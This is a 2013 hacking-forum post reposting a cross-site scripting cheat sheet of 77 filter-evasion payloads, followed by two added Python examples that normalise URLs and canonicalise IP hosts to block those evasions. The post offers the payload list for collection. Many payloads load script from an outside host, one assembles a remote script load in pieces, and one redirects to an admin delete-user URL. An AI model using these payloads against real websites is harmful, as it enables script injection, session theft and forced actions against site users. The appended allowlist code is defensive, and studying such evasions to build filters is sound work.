
XSS Attack Roundup

OP, posted on 2013-4-19 19:22:37
There doesn't seem to be much XSS material on t00ls, so I copied this good stuff over; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme example of XSS
<IMG SRC="javascript:alert('XSS')">
(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically don't work domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters in front (IMG tag)
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, take 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, take 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escape-filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image plus extra characters (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, your XSS code can be smuggled in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Original source: http://fuzzexp.org/u/0day/?p=14
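The encoding tricks in items (3) through (19), and the vbscript: form in (40), all get past a filter that searches for the literal string javascript:, because the browser decodes character references and discards certain control characters before it ever reads the scheme. The Python below is an added example written for this page, not code from the post or from the cheat sheet it copies: it applies those same normalisation steps and only then checks the resulting scheme against an allowlist, with the naive substring check kept alongside for comparison. ALLOWED_SCHEMES is a hypothetical policy for an application of your own, and SAMPLES is constructed input that mirrors the listed payloads.

```python
"""Browser-style normalisation of a URL-valued attribute before a scheme check.
Added example for this page; not from the original post.  The sample payloads
are constructed to mirror items 3-19 and 40 of the list above."""
import html
import re


def naive_blocks(value: str) -> bool:
    """The 2013-era filter: reject only if the literal substring is present.
    Every obfuscated variant in SAMPLES slips past this."""
    return "javascript:" in value


# Leading/trailing C0 controls and spaces are stripped by browsers (item 19);
# tab, LF, CR are removed anywhere in the URL (items 11-14); NUL was ignored
# by browsers of the period (item 17).
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_INNER_IGNORED = re.compile(r"[\x00\t\n\r]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)

# Hypothetical policy: the only schemes this application will emit in SRC/HREF.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def normalize_url(value: str) -> str:
    """Decode character references (decimal or hex, with or without the
    trailing semicolon, with any zero padding), then strip and drop the
    control characters listed above, as the browser does before parsing."""
    decoded = html.unescape(value)
    decoded = _EDGE_CONTROLS.sub("", decoded)
    return _INNER_IGNORED.sub("", decoded)


def url_scheme(value: str):
    """Lower-cased scheme of the normalised URL, or None when the URL is
    relative or protocol-relative (no scheme at all)."""
    m = _SCHEME.match(normalize_url(value))
    return m.group(1).lower() if m else None


def is_allowed_url(value: str) -> bool:
    """Allowlist check: accept scheme-less URLs and approved schemes only.
    javascript, vbscript, data and anything unexpected all fail."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed inputs, one per evasion technique from the list.
SAMPLES = {
    "plain": "javascript:alert('XSS')",                                    # item 3
    "mixed-case": "JaVaScRiPt:alert('XSS')",                               # item 4
    "decimal-entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # item 5
    "padded-no-semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                           "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",  # item 9
    "hex-no-semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",  # item 10
    "tab": "jav\tascript:alert('XSS')",                                     # item 11
    "encoded-tab": "jav&#x09;ascript:alert('XSS')",                         # item 12
    "newline": "jav&#x0A;ascript:alert('XSS')",                             # item 13
    "cr": "jav&#x0D;ascript:alert('XSS')",                                  # item 14
    "nul": "java\x00script:alert('XSS')",                                   # item 17
    "leading-junk": " &#14;  javascript:alert('XSS')",                      # item 19
    "vbscript": 'vbscript:msgbox("XSS")',                                   # item 40
    "remote-script": "http://3w.org/XSS/xss.js",                            # benign http URL (item 1)
    "relative": "/images/logo.png",                                        # benign relative URL
}


def evaluate(samples=SAMPLES):
    """Map each sample to (naive_blocks, is_allowed_url) for a side-by-side view."""
    return {name: (naive_blocks(v), is_allowed_url(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, allowed) in evaluate().items():
        print(f"{name:22} naive-blocks={naive!s:5} allowlist-accepts={allowed}")
```

Two design points: the check is an allowlist of schemes, not a denylist of bad ones, so a scheme the author never thought of fails closed; and normalisation runs on the exact sequence the browser applies (entity decoding first, then whitespace handling), because running those steps in the other order would leave an encoded tab inside the scheme undetected.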
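Items (70) through (76) show why an outbound-link allowlist that compares raw host strings is easy to sidestep: one address can be written in decimal, hex, octal or a mix of them, with a trailing dot, or with no scheme at all. As an added example (not from the post or the cheat sheet it copies), the Python below canonicalises the host the way the WHATWG URL Standard's IPv4 parser does (one to four dot-separated parts; 0x prefix is hex, leading 0 is octal, the last part fills the remaining bytes) and only then consults the allowlist. The allowlist contents and SAMPLE_LINKS are constructed for illustration.

```python
"""Canonicalise a link's host before an allowlist comparison.
Added example for this page; not from the original post.  Covers the
decimal, hex, octal, mixed, trailing-dot and protocol-relative forms of
items 70-76, plus the javascript: link of item 77, which has no host."""
import html
import re
from urllib.parse import urlsplit

_IGNORED = re.compile(r"[\t\n\r]")  # browsers drop these anywhere in a URL


def _parse_part(part: str) -> int:
    """One dotted label as the URL Standard reads it: hex, octal or decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16) if len(part) > 2 else 0
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str):
    """Dotted-quad form if *host* is an IPv4 address in any accepted notation,
    else None (the host is a domain name)."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                      # tolerate a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None                      # a non-numeric label: domain name
    if any(n > 255 for n in nums[:-1]):
        return None
    if nums[-1] >= 256 ** (5 - len(nums)):
        return None                      # last part must fit the remaining bytes
    value = 0
    for n in nums[:-1]:
        value = value * 256 + n
    value = value * 256 ** (5 - len(nums)) + nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def _clean(url: str) -> str:
    return _IGNORED.sub("", html.unescape(url))


def canonical_host(url: str) -> str:
    """Lower-cased host with the trailing dot removed and any IPv4 notation
    rewritten as a plain dotted quad; '' when the URL has no host."""
    host = (urlsplit(_clean(url)).hostname or "").rstrip(".")
    return canonical_ipv4(host) or host


def link_allowed(url: str, allowed_hosts) -> bool:
    """True only for http(s) or protocol-relative links whose canonical host
    is on the allowlist.  A javascript: link has no host and always fails."""
    scheme = urlsplit(_clean(url)).scheme.lower()
    return scheme in ("http", "https", "") and canonical_host(url) in allowed_hosts


# Constructed sample links, one per item of the list.
SAMPLE_LINKS = [
    "http://3232235521/",                  # item 70: decimal
    "http://0xc0.0xa8.0x00.0x01/",         # item 71: hex
    "http://0300.0250.0000.0001/",         # item 72: octal
    "h\ntt\tp://6\t6.000146.0x7.147/",     # item 73: mixed, with the tabs/newlines browsers ignore
    "//www.google.com/",                   # item 74: protocol-relative
    "http://www.google.com./",             # item 76: trailing dot
    "javascript:document.location='http://www.google.com/'",  # item 77: no host at all
]


def audit(urls=SAMPLE_LINKS, allowed_hosts=frozenset({"www.google.com", "66.102.7.147"})):
    """Map each link to (canonical host, allowed?) against a constructed allowlist."""
    return {u: (canonical_host(u), link_allowed(u, allowed_hosts)) for u in urls}


if __name__ == "__main__":
    for url, (host, ok) in audit().items():
        print(f"{url!r:60} -> host={host!r:16} allowed={ok}")
```

The allowlist is consulted only after canonicalisation, so adding 192.168.0.1 to it would also cover the decimal, hex and octal spellings; conversely, a string that parses as a number but is not on the list is rejected even though it looks nothing like a blocked hostname.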